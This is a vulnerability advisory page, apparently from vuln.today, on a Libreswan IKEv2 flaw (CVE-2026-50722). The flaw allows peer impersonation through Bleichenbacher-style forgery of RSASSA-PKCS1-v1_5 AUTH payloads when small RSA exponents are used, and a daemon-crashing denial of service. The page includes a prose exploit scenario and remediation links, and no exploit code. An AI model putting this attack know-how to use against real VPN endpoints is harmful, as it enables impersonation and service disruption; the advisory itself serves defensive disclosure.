Severity by source
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Network-reachable and unauthenticated (PR:N); forgery needs the non-default small-exponent condition, giving AC:H; impersonation yields C:H/I:H and daemon-abort DoS gives A:H.
Primary rating from Vendor (libreswan).
CVSS VectorVendor: libreswan
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
5DescriptionCVE.org
Libreswan, via the function RSA_authenticate_hash_signature_pkcs1_1_5_rsa(), did not correctly verify the DER encoding of the ASN.1 digest when the IKEv2 AUTH payload was encoded using RSASSA-PKCS1-v1_5 (RFC 8017). A remote attacker can use a variation on the Bleichenbacher attack to forge the AUTH payload when small public exponents are used (e.g., e=3), leading to impersonation. Additionally, a remote attacker, by encoding a shorter than expected hash in the AUTH payload, could trigger an assertion leading to denial-of-service. The daemon aborts and restarts; continued exploitation causes sustained denial of service. Remote code execution is not possible. X.509 certificate verifications of the remote IKE peer are not affected.
AnalysisAI
Peer impersonation and denial-of-service in Libreswan IPsec/IKEv2 arises from improper DER/ASN.1 digest verification in RSA_authenticate_hash_signature_pkcs1_1_5_rsa() when the IKEv2 AUTH payload uses RSASSA-PKCS1-v1_5 signatures. A remote unauthenticated attacker can mount a Bleichenbacher-style forgery to impersonate a peer when small RSA public exponents (e.g., e=3) are in use, or send an undersized hash to trip an assertion that aborts and restarts the daemon for sustained DoS. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | For the impersonation/forgery path, the required condition is that the authenticating peer uses IKEv2 AUTH with RSASSA-PKCS1-v1_5 raw RSA signatures AND an RSA key with a small public exponent such as e=3 - this non-default key configuration is the exact prerequisite and the primary limiting factor (modern keys typically use e=65537, which is not vulnerable to the low-exponent forgery). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD CVSS 3.1 score is 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H): network-reachable and unauthenticated (PR:N), but with high attack complexity (AC:H) reflecting the cryptographic conditions and math required. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who can reach the victim's IKEv2 endpoint initiates an IKE_AUTH exchange and submits a forged RSASSA-PKCS1-v1_5 AUTH payload; if the peer key uses a small exponent like e=3, the lax DER parser accepts the crafted signature and the attacker impersonates a trusted peer to establish a VPN tunnel. Alternatively, the attacker repeatedly sends AUTH payloads containing a shorter-than-expected hash, tripping an assertion that aborts the daemon on each attempt for a sustained denial of service. … |
| Remediation | Apply the vendor-released Libreswan patch published at https://libreswan.org/security/CVE-2026-50722/ and detailed in the advisory https://libreswan.org/security/CVE-2026-50722/CVE-2026-50722.txt (upgrade to the fixed release once the exact version is confirmed from that advisory, as the input does not name a specific fix version). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all Libreswan deployments in your infrastructure; document current versions; retrieve the vendor advisory for CVE-2026-50722 to identify the patched version and release date. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Jwt Attack
View allAuthentication bypass in SimpleHelp 5.5.15 and prior (plus 6.0 pre-release builds) allows remote unauthenticated attacke
Authentication bypass in Fortinet FortiOS, FortiProxy, and FortiSwitchManager allows unauthenticated remote attackers to
ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. Rated critical severity (CVS
ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. Rated critical severity (CVS
MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. Rated high severity (C
JWT authentication bypass in pac4j-jwt before 4.5.9/5.7.9/6.3.3 when processing encrypted JWTs. PoC available.
Remote code execution in UpdraftPlus: WP Backup & Migration Plugin for WordPress (versions ≤1.26.4) allows unauthenticat
Authentication bypass in Authlib (Python OAuth/OpenID Connect library) versions 1.6.5 through 1.6.6 allows remote attack
Denial of service in the Go golang.org/x/crypto/ssh library before version 0.52.0 allows unauthenticated remote attacker
Signed XML message tampering in SAP NetWeaver Application Server ABAP and ABAP Platform allows authenticated low-privile
Authentication bypass in Fortinet FortiWeb 8.0.0, 7.6.0-7.6.4, and 7.4.0-7.4.9 allows unauthenticated remote attackers t
Vasion Print (formerly PrinterLogic) before Virtual Appliance Host 22.0.843 Application 20.0.1923 allows Insufficient Si
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41440
GHSA-h4cv-5vw8-2p6m